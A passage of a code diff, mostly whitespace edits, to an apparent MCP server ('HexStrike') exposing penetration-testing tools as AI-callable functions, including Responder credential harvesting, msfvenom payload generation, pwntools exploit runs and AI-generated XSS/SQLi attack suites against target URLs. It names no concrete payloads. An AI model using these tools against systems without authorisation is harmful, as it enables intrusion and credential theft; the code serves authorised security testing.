"top-100-ports", service_scans: str = "default", + heartbeat: int = 60, timeout: int = 300, additional_args: str = "") -> Dict[str, Any]: """ Execute AutoRecon for comprehensive automated reconnaissance. - + Args: target: The target IP address or hostname output_dir: Output directory for results @@ -1537,7 +1537,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: heartbeat: Heartbeat interval in seconds timeout: Timeout for individual scans additional_args: Additional AutoRecon arguments - + Returns: Comprehensive automated reconnaissance results """ @@ -1559,13 +1559,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def enum4linux_ng_advanced(target: str, username: str = "", password: str = "", - domain: str = "", shares: bool = True, users: bool = True, - groups: bool = True, policy: bool = True, + def enum4linux_ng_advanced(target: str, username: str = "", password: str = "", + domain: str = "", shares: bool = True, users: bool = True, + groups: bool = True, policy: bool = True, additional_args: str = "") -> Dict[str, Any]: """ Execute Enum4linux-ng for advanced SMB enumeration with enhanced logging. - + Args: target: The target IP address username: Username for authentication @@ -1576,7 +1576,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: groups: Enumerate groups policy: Enumerate policies additional_args: Additional Enum4linux-ng arguments - + Returns: Advanced SMB enumeration results """ @@ -1600,12 +1600,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def rpcclient_enumeration(target: str, username: str = "", password: str = "", - domain: str = "", commands: str = "enumdomusers;enumdomgroups;querydominfo", + def rpcclient_enumeration(target: str, username: str = "", password: str = "", + domain: str = "", commands: str = "enumdomusers;enumdomgroups;querydominfo", additional_args: str = "") -> Dict[str, Any]: """ Execute rpcclient for RPC enumeration with enhanced logging. - + Args: target: The target IP address username: Username for authentication @@ -1613,7 +1613,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: domain: Domain for authentication commands: Semicolon-separated RPC commands additional_args: Additional rpcclient arguments - + Returns: RPC enumeration results """ @@ -1634,17 +1634,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def nbtscan_netbios(target: str, verbose: bool = False, timeout: int = 2, + def nbtscan_netbios(target: str, verbose: bool = False, timeout: int = 2, additional_args: str = "") -> Dict[str, Any]: """ Execute nbtscan for NetBIOS name scanning with enhanced logging. - + Args: target: The target IP address or range verbose: Enable verbose output timeout: Timeout in seconds additional_args: Additional nbtscan arguments - + Returns: NetBIOS name scanning results """ @@ -1663,11 +1663,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def arp_scan_discovery(target: str = "", interface: str = "", local_network: bool = False, + def arp_scan_discovery(target: str = "", interface: str = "", local_network: bool = False, timeout: int = 500, retry: int = 3, additional_args: str = "") -> Dict[str, Any]: """ Execute arp-scan for network discovery with enhanced logging. - + Args: target: The target IP range (if not using local_network) interface: Network interface to use @@ -1675,7 +1675,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: timeout: Timeout in milliseconds retry: Number of retries additional_args: Additional arp-scan arguments - + Returns: Network discovery results via ARP scanning """ @@ -1696,13 +1696,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def responder_credential_harvest(interface: str = "eth0", analyze: bool = False, - wpad: bool = True, force_wpad_auth: bool = False, - fingerprint: bool = False, duration: int = 300, + def responder_credential_harvest(interface: str = "eth0", analyze: bool = False, + wpad: bool = True, force_wpad_auth: bool = False, + fingerprint: bool = False, duration: int = 300, additional_args: str = "") -> Dict[str, Any]: """ Execute Responder for credential harvesting with enhanced logging. - + Args: interface: Network interface to use analyze: Analyze mode only @@ -1711,7 +1711,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: fingerprint: Fingerprint mode duration: Duration to run in seconds additional_args: Additional Responder arguments - + Returns: Credential harvesting results """ @@ -1736,13 +1736,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def volatility_analyze(memory_file: str, plugin: str, profile: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Volatility for memory forensics analysis with enhanced logging. - + Args: memory_file: Path to memory dump file plugin: Volatility plugin to use profile: Memory profile to use additional_args: Additional Volatility arguments - + Returns: Memory forensics analysis results """ @@ -1764,7 +1764,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def msfvenom_generate(payload: str, format_type: str = "", output_file: str = "", encoder: str = "", iterations: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute MSFVenom for payload generation with enhanced logging. - + Args: payload: The payload to generate format_type: Output format (exe, elf, raw, etc.) @@ -1772,7 +1772,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: encoder: Encoder to use iterations: Number of encoding iterations additional_args: Additional MSFVenom arguments - + Returns: Payload generation results """ @@ -1800,13 +1800,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def gdb_analyze(binary: str, commands: str = "", script_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute GDB for binary analysis and debugging with enhanced logging. - + Args: binary: Path to the binary file commands: GDB commands to execute script_file: Path to GDB script file additional_args: Additional GDB arguments - + Returns: Binary analysis results """ @@ -1828,12 +1828,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def radare2_analyze(binary: str, commands: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Radare2 for binary analysis and reverse engineering with enhanced logging. - + Args: binary: Path to the binary file commands: Radare2 commands to execute additional_args: Additional Radare2 arguments - + Returns: Binary analysis results """ @@ -1854,12 +1854,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def binwalk_analyze(file_path: str, extract: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Binwalk for firmware and file analysis with enhanced logging. - + Args: file_path: Path to the file to analyze extract: Whether to extract discovered files additional_args: Additional Binwalk arguments - + Returns: Firmware analysis results """ @@ -1880,12 +1880,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ropgadget_search(binary: str, gadget_type: str = "", additional_args: str = "") -> Dict[str, Any]: """ Search for ROP gadgets in a binary using ROPgadget with enhanced logging. - + Args: binary: Path to the binary file gadget_type: Type of gadgets to search for additional_args: Additional ROPgadget arguments - + Returns: ROP gadget search results """ @@ -1906,10 +1906,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def checksec_analyze(binary: str) -> Dict[str, Any]: """ Check security features of a binary with enhanced logging. - + Args: binary: Path to the binary file - + Returns: Security features analysis results """ @@ -1928,13 +1928,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def xxd_hexdump(file_path: str, offset: str = "0", length: str = "", additional_args: str = "") -> Dict[str, Any]: """ Create a hex dump of a file using xxd with enhanced logging. - + Args: file_path: Path to the file offset: Offset to start reading from length: Number of bytes to read additional_args: Additional xxd arguments - + Returns: Hex dump results """ @@ -1956,12 +1956,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def strings_extract(file_path: str, min_len: int = 4, additional_args: str = "") -> Dict[str, Any]: """ Extract strings from a binary file with enhanced logging. - + Args: file_path: Path to the file min_len: Minimum string length additional_args: Additional strings arguments - + Returns: String extraction results """ @@ -1982,12 +1982,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def objdump_analyze(binary: str, disassemble: bool = True, additional_args: str = "") -> Dict[str, Any]: """ Analyze a binary using objdump with enhanced logging. - + Args: binary: Path to the binary file disassemble: Whether to disassemble the binary additional_args: Additional objdump arguments - + Returns: Binary analysis results """ @@ -2009,12 +2009,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def ghidra_analysis(binary: str, project_name: str = "hexstrike_analysis", - script_file: str = "", analysis_timeout: int = 300, + def ghidra_analysis(binary: str, project_name: str = "hexstrike_analysis", + script_file: str = "", analysis_timeout: int = 300, output_format: str = "xml", additional_args: str = "") -> Dict[str, Any]: """ Execute Ghidra for advanced binary analysis and reverse engineering. - + Args: binary: Path to the binary file project_name: Ghidra project name @@ -2022,7 +2022,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: analysis_timeout: Analysis timeout in seconds output_format: Output format (xml, json) additional_args: Additional Ghidra arguments - + Returns: Advanced binary analysis results from Ghidra """ @@ -2043,12 +2043,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def pwntools_exploit(script_content: str = "", target_binary: str = "", - target_host: str = "", target_port: int = 0, + def pwntools_exploit(script_content: str = "", target_binary: str = "", + target_host: str = "", target_port: int = 0, exploit_type: str = "local", additional_args: str = "") -> Dict[str, Any]: """ Execute Pwntools for exploit development and automation. - + Args: script_content: Python script content using pwntools target_binary: Local binary to exploit @@ -2056,7 +2056,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: target_port: Remote port to connect to exploit_type: Type of exploit (local, remote, format_string, rop) additional_args: Additional arguments - + Returns: Exploit execution results """ @@ -2080,12 +2080,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def one_gadget_search(libc_path: str, level: int = 1, additional_args: str = "") -> Dict[str, Any]: """ Execute one_gadget to find one-shot RCE gadgets in libc. - + Args: libc_path: Path to libc binary level: Constraint level (0, 1, 2) additional_args: Additional one_gadget arguments - + Returns: One-shot RCE gadget search results """ @@ -2103,17 +2103,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def libc_database_lookup(action: str = "find", symbols: str = "", + def libc_database_lookup(action: str = "find", symbols: str = "", libc_id: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute libc-database for libc identification and offset lookup. - + Args: action: Action to perform (find, dump, download) symbols: Symbols with offsets for find action (format: "symbol1:offset1 symbol2:offset2") libc_id: Libc ID for dump/download actions additional_args: Additional arguments - + Returns: Libc database lookup results """ @@ -2132,18 +2132,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def gdb_peda_debug(binary: str = "", commands: str = "", attach_pid: int = 0, + def gdb_peda_debug(binary: str = "", commands: str = "", attach_pid: int = 0, core_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute GDB with PEDA for enhanced debugging and exploitation. - + Args: binary: Binary to debug commands: GDB commands to execute attach_pid: Process ID to attach to core_file: Core dump file to analyze additional_args: Additional GDB arguments - + Returns: Enhanced debugging results with PEDA """ @@ -2163,12 +2163,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def angr_symbolic_execution(binary: str, script_content: str = "", - find_address: str = "", avoid_addresses: str = "", + def angr_symbolic_execution(binary: str, script_content: str = "", + find_address: str = "", avoid_addresses: str = "", analysis_type: str = "symbolic", additional_args: str = "") -> Dict[str, Any]: """ Execute angr for symbolic execution and binary analysis. - + Args: binary: Binary to analyze script_content: Custom angr script content @@ -2176,7 +2176,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: avoid_addresses: Comma-separated addresses to avoid analysis_type: Type of analysis (symbolic, cfg, static) additional_args: Additional arguments - + Returns: Symbolic execution and binary analysis results """ @@ -2197,12 +2197,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def ropper_gadget_search(binary: str, gadget_type: str = "rop", quality: int = 1, - arch: str = "", search_string: str = "", + def ropper_gadget_search(binary: str, gadget_type: str = "rop", quality: int = 1, + arch: str = "", search_string: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute ropper for advanced ROP/JOP gadget searching. - + Args: binary: Binary to search for gadgets gadget_type: Type of gadgets (rop, jop, sys, all) @@ -2210,7 +2210,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: arch: Target architecture (x86, x86_64, arm, etc.) search_string: Specific gadget pattern to search for additional_args: Additional ropper arguments - + Returns: Advanced ROP/JOP gadget search results """ @@ -2231,18 +2231,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def pwninit_setup(binary: str, libc: str = "", ld: str = "", + def pwninit_setup(binary: str, libc: str = "", ld: str = "", template_type: str = "python", additional_args: str = "") -> Dict[str, Any]: """ Execute pwninit for CTF binary exploitation setup. - + Args: binary: Binary file to set up libc: Libc file to use ld: Loader file to use template_type: Template type (python, c) additional_args: Additional pwninit arguments - + Returns: CTF binary exploitation setup results """ @@ -2265,13 +2265,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def feroxbuster_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", threads: int = 10, additional_args: str = "") -> Dict[str, Any]: """ Execute Feroxbuster for recursive content discovery with enhanced logging. - + Args: url: The target URL wordlist: Wordlist file to use threads: Number of threads additional_args: Additional Feroxbuster arguments - + Returns: Content discovery results """ @@ -2293,12 +2293,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def dotdotpwn_scan(target: str, module: str = "http", additional_args: str = "") -> Dict[str, Any]: """ Execute DotDotPwn for directory traversal testing with enhanced logging. - + Args: target: The target hostname or IP module: Module to use (http, ftp, tftp, etc.) additional_args: Additional DotDotPwn arguments - + Returns: Directory traversal test results """ @@ -2319,12 +2319,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def xsser_scan(url: str, params: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute XSSer for XSS vulnerability testing with enhanced logging. - + Args: url: The target URL params: Parameters to test additional_args: Additional XSSer arguments - + Returns: XSS vulnerability test results """ @@ -2345,12 +2345,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def wfuzz_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]: """ Execute Wfuzz for web application fuzzing with enhanced logging. - + Args: url: The target URL (use FUZZ where you want to inject payloads) wordlist: Wordlist file to use additional_args: Additional Wfuzz arguments - + Returns: Web application fuzzing results """ @@ -2372,12 +2372,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ @mcp.tool() - def dirsearch_scan(url: str, extensions: str = "php,html,js,txt,xml,json", - wordlist: str = "/usr/share/wordlists/dirsearch/common.txt", + def dirsearch_scan(url: str, extensions: str = "php,html,js,txt,xml,json", + wordlist: str = "/usr/share/wordlists/dirsearch/common.txt", threads: int = 30, recursive: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Dirsearch for advanced directory and file discovery with enhanced logging. - + Args: url: The target URL extensions: File extensions to search for @@ -2385,7 +2385,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: threads: Number of threads to use recursive: Enable recursive scanning additional_args: Additional Dirsearch arguments - + Returns: Advanced directory discovery results """ @@ -2406,12 +2406,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def katana_crawl(url: str, depth: int = 3, js_crawl: bool = True, - form_extraction: bool = True, output_format: str = "json", + def katana_crawl(url: str, depth: int = 3, js_crawl: bool = True, + form_extraction: bool = True, output_format: str = "json", additional_args: str = "") -> Dict[str, Any]: """ Execute Katana for next-generation crawling and spidering with enhanced logging. - + Args: url: The target URL to crawl depth: Crawling depth @@ -2419,7 +2419,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: form_extraction: Enable form extraction output_format: Output format (json, txt) additional_args: Additional Katana arguments - + Returns: Advanced web crawling results with endpoints and forms """ @@ -2440,19 +2440,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def gau_discovery(domain: str, providers: str = "wayback,commoncrawl,otx,urlscan", - include_subs: bool = True, blacklist: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", + def gau_discovery(domain: str, providers: str = "wayback,commoncrawl,otx,urlscan", + include_subs: bool = True, blacklist: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", additional_args: str = "") -> Dict[str, Any]: """ Execute Gau (Get All URLs) for URL discovery from multiple sources with enhanced logging. - + Args: domain: The target domain providers: Data providers to use include_subs: Include subdomains blacklist: File extensions to blacklist additional_args: Additional Gau arguments - + Returns: Comprehensive URL discovery results from multiple sources """ @@ -2472,17 +2472,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def waybackurls_discovery(domain: str, get_versions: bool = False, + def waybackurls_discovery(domain: str, get_versions: bool = False, no_subs: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Waybackurls for historical URL discovery with enhanced logging. - + Args: domain: The target domain get_versions: Get all versions of URLs no_subs: Don't include subdomains additional_args: Additional Waybackurls arguments - + Returns: Historical URL discovery results from Wayback Machine """ @@ -2501,12 +2501,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def arjun_parameter_discovery(url: str, method: str = "GET", wordlist: str = "", - delay: int = 0, threads: int = 25, stable: bool = False, + def arjun_parameter_discovery(url: str, method: str = "GET", wordlist: str = "", + delay: int = 0, threads: int = 25, stable: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Arjun for HTTP parameter discovery with enhanced logging. - + Args: url: The target URL method: HTTP method to use @@ -2515,7 +2515,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: threads: Number of threads stable: Use stable mode additional_args: Additional Arjun arguments - + Returns: HTTP parameter discovery results """ @@ -2537,19 +2537,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def paramspider_mining(domain: str, level: int = 2, - exclude: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", + def paramspider_mining(domain: str, level: int = 2, + exclude: str = "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico", output: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute ParamSpider for parameter mining from web archives with enhanced logging. - + Args: domain: The target domain level: Mining level depth exclude: File extensions to exclude output: Output file path additional_args: Additional ParamSpider arguments - + Returns: Parameter mining results from web archives """ @@ -2569,12 +2569,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def x8_parameter_discovery(url: str, wordlist: str = "/usr/share/wordlists/x8/params.txt", - method: str = "GET", body: str = "", headers: str = "", + def x8_parameter_discovery(url: str, wordlist: str = "/usr/share/wordlists/x8/params.txt", + method: str = "GET", body: str = "", headers: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute x8 for hidden parameter discovery with enhanced logging. - + Args: url: The target URL wordlist: Parameter wordlist @@ -2582,7 +2582,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: body: Request body headers: Custom headers additional_args: Additional x8 arguments - + Returns: Hidden parameter discovery results """ @@ -2603,12 +2603,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def jaeles_vulnerability_scan(url: str, signatures: str = "", config: str = "", - threads: int = 20, timeout: int = 20, + def jaeles_vulnerability_scan(url: str, signatures: str = "", config: str = "", + threads: int = 20, timeout: int = 20, additional_args: str = "") -> Dict[str, Any]: """ Execute Jaeles for advanced vulnerability scanning with custom signatures. - + Args: url: The target URL signatures: Custom signature path @@ -2616,7 +2616,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: threads: Number of threads timeout: Request timeout additional_args: Additional Jaeles arguments - + Returns: Advanced vulnerability scanning results with custom signatures """ @@ -2637,12 +2637,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def dalfox_xss_scan(url: str, pipe_mode: bool = False, blind: bool = False, - mining_dom: bool = True, mining_dict: bool = True, + def dalfox_xss_scan(url: str, pipe_mode: bool = False, blind: bool = False, + mining_dom: bool = True, mining_dict: bool = True, custom_payload: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Dalfox for advanced XSS vulnerability scanning with enhanced logging. - + Args: url: The target URL pipe_mode: Use pipe mode for input @@ -2651,7 +2651,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: mining_dict: Enable dictionary mining custom_payload: Custom XSS payload additional_args: Additional Dalfox arguments - + Returns: Advanced XSS vulnerability scanning results """ @@ -2673,13 +2673,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def httpx_probe(target: str, probe: bool = True, tech_detect: bool = False, - status_code: bool = False, content_length: bool = False, - title: bool = False, web_server: bool = False, threads: int = 50, + def httpx_probe(target: str, probe: bool = True, tech_detect: bool = False, + status_code: bool = False, content_length: bool = False, + title: bool = False, web_server: bool = False, threads: int = 50, additional_args: str = "") -> Dict[str, Any]: """ Execute httpx for fast HTTP probing and technology detection. - + Args: target: Target file or single URL probe: Enable probing @@ -2690,7 +2690,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: web_server: Show web server threads: Number of threads additional_args: Additional httpx arguments - + Returns: Fast HTTP probing results with technology detection """ @@ -2714,16 +2714,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def anew_data_processing(input_data: str, output_file: str = "", + def anew_data_processing(input_data: str, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute anew for appending new lines to files (useful for data processing). - + Args: input_data: Input data to process output_file: Output file path additional_args: Additional anew arguments - + Returns: Data processing results with unique line filtering """ @@ -2741,16 +2741,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def qsreplace_parameter_replacement(urls: str, replacement: str = "FUZZ", + def qsreplace_parameter_replacement(urls: str, replacement: str = "FUZZ", additional_args: str = "") -> Dict[str, Any]: """ Execute qsreplace for query string parameter replacement. - + Args: urls: URLs to process replacement: Replacement string for parameters additional_args: Additional qsreplace arguments - + Returns: Parameter replacement results for fuzzing """ @@ -2768,17 +2768,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def uro_url_filtering(urls: str, whitelist: str = "", blacklist: str = "", + def uro_url_filtering(urls: str, whitelist: str = "", blacklist: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute uro for filtering out similar URLs. - + Args: urls: URLs to filter whitelist: Whitelist patterns blacklist: Blacklist patterns additional_args: Additional uro arguments - + Returns: Filtered URL results with duplicates removed """ @@ -2804,13 +2804,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ai_generate_payload(attack_type: str, complexity: str = "basic", technology: str = "", url: str = "") -> Dict[str, Any]: """ Generate AI-powered contextual payloads for security testing. - + Args: attack_type: Type of attack (xss, sqli, lfi, cmd_injection, ssti, xxe) complexity: Complexity level (basic, advanced, bypass) technology: Target technology (php, asp, jsp, python, nodejs) url: Target URL for context - + Returns: Contextual payloads with risk assessment and test cases """ @@ -2822,12 +2822,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿค– Generating AI payloads for {attack_type} attack") result = hexstrike_client.safe_post("api/ai/generate_payload", data) - + if result.get("success"): payload_data = result.get("ai_payload_generation", {}) count = payload_data.get("payload_count", 0) logger.info(f"โœ… Generated {count} contextual {attack_type} payloads") - + # Log some example payloads for user awareness payloads = payload_data.get("payloads", []) if payloads: @@ -2838,19 +2838,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" โ”œโ”€ [{risk}] {context}: {payload_info['payload'][:50]}...") else: logger.error("โŒ AI payload generation failed") - + return result @mcp.tool() def ai_test_payload(payload: str, target_url: str, method: str = "GET") -> Dict[str, Any]: """ Test generated payload against target with AI analysis. - + Args: payload: The payload to test target_url: Target URL to test against method: HTTP method (GET, POST) - + Returns: Test results with AI analysis and vulnerability assessment """ @@ -2861,30 +2861,30 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿงช Testing AI payload against {target_url}") result = hexstrike_client.safe_post("api/ai/test_payload", data) - + if result.get("success"): analysis = result.get("ai_analysis", {}) potential_vuln = analysis.get("potential_vulnerability", False) logger.info(f"๐Ÿ” Payload test completed | Vulnerability detected: {potential_vuln}") - + if potential_vuln: logger.warning("โš ๏ธ Potential vulnerability found! Review the response carefully.") else: logger.info("โœ… No obvious vulnerability indicators detected") else: logger.error("โŒ Payload testing failed") - + return result @mcp.tool() def ai_generate_attack_suite(target_url: str, attack_types: str = "xss,sqli,lfi") -> Dict[str, Any]: """ Generate comprehensive attack suite with multiple payload types. - + Args: target_url: Target URL for testing attack_types: Comma-separated list of attack types - + Returns: Comprehensive attack suite with multiple payload types """ @@ -2899,34 +2899,34 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "test_cases": 0 } } - + logger.info(f"๐Ÿš€ Generating comprehensive attack suite for {target_url}") logger.info(f"๐ŸŽฏ Attack types: {', '.join(attack_list)}") - + for attack_type in attack_list: logger.info(f"๐Ÿค– Generating {attack_type} payloads...") - + # Generate payloads for this attack type payload_result = self.ai_generate_payload(attack_type, "advanced", "", target_url) - + if payload_result.get("success"): payload_data = payload_result.get("ai_payload_generation", {}) results["payload_suites"][attack_type] = payload_data - + # Update summary results["summary"]["total_payloads"] += payload_data.get("payload_count", 0) results["summary"]["test_cases"] += len(payload_data.get("test_cases", [])) - + # Count high-risk payloads for payload_info in payload_data.get("payloads", []): if payload_info.get("risk_level") == "HIGH": results["summary"]["high_risk_payloads"] += 1 - + logger.info(f"โœ… Attack suite generated:") logger.info(f" โ”œโ”€ Total payloads: {results['summary']['total_payloads']}") logger.info(f" โ”œโ”€ High-risk payloads: {results['summary']['high_risk_payloads']}") logger.info(f" โ””โ”€ Test cases: {results['summary']['test_cases']}") - + return { "success": True, "attack_suite": results, @@ -2941,13 +2941,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def api_fuzzer(base_url: str, endpoints: str = "", methods: str = "GET,POST,PUT,DELETE", wordlist: str = "/usr/share/wordlists/api/api-endpoints.txt") -> Dict[str, Any]: """ Advanced API endpoint fuzzing with intelligent parameter discovery. - + Args: base_url: Base URL of the API endpoints: Comma-separated list of specific endpoints to test methods: HTTP methods to test (comma-separated) wordlist: Wordlist for endpoint discovery - + Returns: API fuzzing results with endpoint discovery and vulnerability assessment """ @@ -2957,10 +2957,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "methods": [m.strip() for m in methods.split(",")], "wordlist": wordlist } - + logger.info(f"๐Ÿ” Starting API fuzzing: {base_url}") result = hexstrike_client.safe_post("api/tools/api_fuzzer", data) - + if result.get("success"): fuzzing_type = result.get("fuzzing_type", "unknown") if fuzzing_type == "endpoint_testing": @@ -2970,20 +2970,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"โœ… API endpoint discovery completed") else: logger.error("โŒ API fuzzing failed") - + return result @mcp.tool() def graphql_scanner(endpoint: str, introspection: bool = True, query_depth: int = 10, test_mutations: bool = True) -> Dict[str, Any]: """ Advanced GraphQL security scanning and introspection. - + Args: endpoint: GraphQL endpoint URL introspection: Test introspection queries query_depth: Maximum query depth to test test_mutations: Test mutation operations - + Returns: GraphQL security scan results with vulnerability assessment """ @@ -2993,17 +2993,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "query_depth": query_depth, "test_mutations": test_mutations } - + logger.info(f"๐Ÿ” Starting GraphQL security scan: {endpoint}") result = hexstrike_client.safe_post("api/tools/graphql_scanner", data) - + if result.get("success"): scan_results = result.get("graphql_scan_results", {}) vuln_count = len(scan_results.get("vulnerabilities", [])) tests_count = len(scan_results.get("tests_performed", [])) - + logger.info(f"โœ… GraphQL scan completed: {tests_count} tests, {vuln_count} vulnerabilities") - + if vuln_count > 0: logger.warning(f"โš ๏ธ Found {vuln_count} GraphQL vulnerabilities!") for vuln in scan_results.get("vulnerabilities", [])[:3]: # Show first 3 @@ -3012,18 +3012,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.warning(f" โ”œโ”€ [{severity}] {vuln_type}") else: logger.error("โŒ GraphQL scanning failed") - + return result @mcp.tool() def jwt_analyzer(jwt_token: str, target_url: str = "") -> Dict[str, Any]: """ Advanced JWT token analysis and vulnerability testing. - + Args: jwt_token: JWT token to analyze target_url: Optional target URL for testing token manipulation - + Returns: JWT analysis results with vulnerability assessment and attack vectors """ @@ -3031,18 +3031,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "jwt_token": jwt_token, "target_url": target_url } - + logger.info(f"๐Ÿ” Starting JWT security analysis") result = hexstrike_client.safe_post("api/tools/jwt_analyzer", data) - + if result.get("success"): analysis = result.get("jwt_analysis_results", {}) vuln_count = len(analysis.get("vulnerabilities", [])) algorithm = analysis.get("token_info", {}).get("algorithm", "unknown") - + logger.info(f"โœ… JWT analysis completed: {vuln_count} vulnerabilities found") logger.info(f"๐Ÿ” Token algorithm: {algorithm}") - + if vuln_count > 0: logger.warning(f"โš ๏ธ Found {vuln_count} JWT vulnerabilities!") for vuln in analysis.get("vulnerabilities", [])[:3]: # Show first 3 @@ -3051,18 +3051,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.warning(f" โ”œโ”€ [{severity}] {vuln_type}") else: logger.error("โŒ JWT analysis 